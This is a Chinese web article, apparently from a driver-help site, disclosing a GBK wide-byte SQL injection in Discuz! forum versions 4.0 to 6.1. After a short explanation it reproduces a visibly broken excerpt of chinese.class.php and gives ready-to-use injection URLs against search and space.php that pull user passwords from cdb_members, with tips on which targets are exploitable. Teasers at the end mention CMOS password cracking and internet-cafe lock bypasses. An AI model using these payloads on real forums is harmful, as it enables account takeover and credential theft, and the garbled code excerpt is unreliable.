discuz论坛模板功能区存在注射漏洞

2018-01-21 13:37:25责编：llp 来源：驱动管家人气：

Discuz论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑。

discuz论坛模板功能区存在注射漏洞

由于 PHP 对多字节字符集的支持存在问题，在各种编码相互转换过程中，有可能引发程序溢出和程序错误

提交一个 '

转意成 \'

然后转成gbk的，\和'就变成两个字符了

'就可以成功的引入

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

复制代码

代码如下:

if(defined('IN_DISCUZ')) {

exit('Access Denied');

}

define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/');

class Chinese {

var $table = '';

var $iconv_enabled = false;

var $unicode_table = array();

var $config = array

(

'SourceLang' =>'',

'TargetLang' =>'',

'GBtoUnicode_table' =>'gb-unicode.table',

'BIG5toUnicode_table' =>'big5-unicode.table',

);

function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {

$this->config['SourceLang'] = $this->_lang($SourceLang);

$this->config['TargetLang'] = $this->_lang($TargetLang);

if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {

$this->iconv_enabled = true;

} else {

$this->iconv_enabled = false;

$this->OpenTable();

}

function _lang($LangCode) {

$LangCode = strtoupper($LangCode);

if(substr($LangCode, 0, 2) == ‘GB’) {

return ‘GBK’;

} elseif(substr($LangCode, 0, 3) == ‘BIG’) {

return ‘BIG5′;

} elseif(substr($LangCode, 0, 3) == ‘UTF’) {

return ‘UTF-8′;

} elseif(substr($LangCode, 0, 3) == ‘UNI’) {

return ‘UNICODE’;

}

function _hex2bin($hexdata) {

for($i=0; $i < strlen($hexdata); $i += 2) {

$bindata .= chr(hexdec(substr($hexdata, $i, 2)));

}

return $bindata;

}

chinese.class.php (utf-8不能利用)

searchid=22%cf'UNION SELECT 1,password,3,passwordfromcdb_memberswhereuid=1/*&do=submit

/space.php?username=%cf'%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,password,50,51,52,53,54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84%20from%20cdb_members%20where%20uid=1/*

直接放在url后面可以爆出ｉｄ＝１的用户密码，还可以自己根据需要更改，要注意一点的是，目标必须开了WAP，而且没有打上补丁，WAP浏览吧

影响版本:

Discuz!4.0.0

Discuz!4.1.0

Discuz!5.0.0

Discuz!5.5.0

Discuz!6.0.0

Discuz!6.1.0

大蜘蛛杀毒软件怎么卸载？大蜘蛛杀毒软件的卸载方法
Dr Web大蜘蛛反病毒2008专业版，在软件程序设计的又如何呢，我们今天来检查一下它的卸载过程。
详情2018-01-04 10:30:53责编：llp 来源：驱动管家
怎么解决苹果浏览器safari处理超长的文件时存在漏洞的问题？
Safari处理超长的文件时存在漏洞，如果使用Safari下载了带有超长文件名的文件的话，就可以触发访问破坏，浏览器可能会崩溃。发布日期：2008-03-22 更新日期：2008-03-24 受影响系统： Apple Safari 3 1 描述： --------------------------------
详情2018-01-15 12:34:06责编：llp 来源：驱动管家
cmos的密码怎么破解？cmos破解密码的方法
1 简单的DOS下DEBUG破解程序：用软盘启动进入DOS下，执行Debug程序（你没有，那得去拷贝一个啊）1）debugo 70 2e （回车）o 71 00 （回车）o 70 2f （回车）o 71 00 （回车）然后重新启动，就一进入C
详情2018-01-08 15:03:45责编：llp 来源：驱动管家
u盘启动盘制作工具有风险盗版软件多且可能带病毒
一、概述1 盗版软件用户和“APT攻击”我国电脑用户当中，使用盗版软件是非常普遍的现象，从盗版的Windows系统到各种收费软件的“破解版”等等。互联网上也充斥着各种帮助用户使用盗版的“激活工具”、“破解工具
详情2018-01-18 14:39:47责编：llp 来源：驱动管家
网络安全密钥怎么获取密钥生成算法？
从拷贝保护产品中剥取（ripping）算法通常是创建密钥生成程序的一种简单而行之有效的方法。其思路非常简单：定位受保护程序内计算合法序列号的函数（可能不止一个函数），并将它（们）移植到你密钥生成程序中。这
详情2018-01-13 17:21:44责编：llp 来源：驱动管家
警惕免费wifi，提高免费wifi连接的安全防范意识
公共场所免费wifi如何安全使用警惕黑网315晚会三大运营商齐中枪央视在315晚会现场演示了黑客利用免费WiFi网络窃取用户微信照片以及邮箱账号密码的过程。安全专家指出，用户的个人信息被窃取就是因为手机连接了
详情2018-01-03 13:59:49责编：llp 来源：驱动管家
网吧破解怎么做？怎么破解网吧？
解万象秘笈一用Alt Ctrl Del组合键（万象）开机后，当出现蓝背景时，立即按组合键，弹出“关闭程序”对话框，若里面有“client”后则立即关闭，当发现“未知”程序时也要关闭，因为万象会启动两次。万象被结束了，
详情2018-01-05 09:14:06责编：llp 来源：驱动管家
手机信息安全吗？手机信息是怎样泄露的？
如果你给自己的手机设置了PIN码，甚至忘记了连自己也解不开；又或者设置了比划甚至指纹解锁，然后以为这样的手机就是安全的了。是的，对于一般的人来说算安全了，可是对于真正想要你手机里内容的黑客，一次简单的
详情2018-01-16 18:10:00责编：llp 来源：驱动管家
文档安全的加密技术文档安全加密系统的原理
加密技术是利用数学或物理手段，对电子信息在传输过程中或存储设备内的数据进行保护，以防止泄漏的技术。在信息安全技术中，加密技术占有重要的地位，在保密通信、数据安全、软件加密等均使用了加密技术。常用的
详情2018-01-13 15:37:44责编：llp 来源：驱动管家
网页木马有哪些攻击方式？网页木马怎么防御？
常见的网页木马攻击手段有哪些？用户应该如何识别及防御来自网页木马的攻击？笔者将在本文为用户细细道来：
详情2018-01-09 16:05:14责编：llp 来源：驱动管家